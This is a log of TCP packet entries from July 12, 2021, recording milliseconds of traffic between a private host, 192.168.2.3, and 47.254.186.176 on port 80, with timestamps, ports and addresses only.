Jul 12, 2021 10:28:46.425273895 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425296068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425307035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.425324917 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425340891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.425357103 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425374031 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.425393105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425405025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.425424099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425435066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.425461054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.425467968 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425487041 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425502062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.425518036 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425538063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.425559998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425570011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.425596952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.425602913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425628901 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425637007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.425658941 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425669909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.425684929 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425718069 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.425982952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426007986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426026106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426047087 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426062107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426079988 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426091909 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426104069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426131010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426137924 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426158905 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426166058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426188946 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426197052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426218987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426229954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426259041 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426414967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426441908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426476002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426486015 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426512957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426542044 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426584959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426595926 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426620960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426640987 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426656961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426672935 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426692963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426703930 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426743984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426785946 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426841974 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426858902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426882982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426904917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426928043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426937103 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.426959038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.426980972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427004099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427016020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427040100 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427052021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427064896 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427084923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427109957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427136898 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427155972 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427182913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427190065 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427232981 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427314043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427342892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427371025 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427395105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427563906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427591085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427613974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427624941 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427654982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427663088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427681923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427699089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427710056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427732944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427752972 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427767038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427788019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427802086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427820921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427835941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427846909 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427869081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427892923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427898884 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427918911 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427928925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427949905 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427964926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.427978039 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.427999973 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428010941 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428034067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428045034 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428067923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428083897 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428102016 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428112984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428136110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428155899 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428169966 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428183079 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428189993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428215981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428247929 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428267002 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428284883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428309917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428338051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428344965 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428365946 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428380013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428391933 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428411007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428436041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428443909 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428467035 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428491116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428596020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428646088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428657055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428702116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428724051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428750038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428774118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428782940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428806067 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428817987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428831100 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428852081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428869009 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428889036 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428901911 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428927898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428940058 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.428966999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.428978920 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429004908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429017067 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429040909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429054022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429075956 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429088116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429111004 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429121971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429148912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429161072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429184914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429193974 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429214001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429234028 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429243088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429265976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429271936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429295063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429301977 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429326057 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429361105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429462910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429522038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429543018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429569006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429593086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429601908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429631948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429639101 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429653883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429680109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429758072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429811954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429821968 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429847002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429863930 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429903030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429910898 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429935932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.429965019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.429991007 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430187941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430258036 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430272102 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430291891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430314064 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430325031 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430347919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430367947 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430386066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430413961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430424929 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430450916 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430463076 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430484056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430499077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430510998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430531025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430556059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430578947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430593967 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430599928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430619001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430634022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430651903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430675983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430686951 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430706024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430730104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430740118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430762053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.430804968 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.430821896 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431010008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431042910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431088924 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431128979 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431149006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431199074 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431211948 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431227922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431246996 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431277990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431287050 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431324005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431334019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431355953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431380987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431387901 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431406021 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431418896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431428909 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431448936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431477070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431483984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431509018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431516886 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431531906 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431555033 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431610107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431660891 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431730032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431782961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431811094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431835890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.431862116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431890965 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.431994915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432015896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432045937 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432076931 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432111979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432136059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432162046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432168961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432192087 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432214022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432255030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432280064 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432307959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432313919 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432332039 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432347059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432356119 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432379961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432390928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432430983 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432455063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432501078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432513952 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432540894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432564020 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432579041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432607889 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432621002 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432626963 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432660103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432667971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432693958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432707071 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432733059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432742119 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432780981 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432852983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432876110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432897091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432908058 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432938099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432945013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432964087 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.432976007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.432985067 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433027029 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433052063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433098078 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433469057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433499098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433522940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433536053 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433564901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433581114 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433598995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433621883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433633089 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433660984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433679104 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433696985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433741093 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433765888 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433789015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433815002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433839083 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433851004 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433875084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433883905 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433907032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433912992 CEST	49720	80	192.168.2.3	47.254.186.176
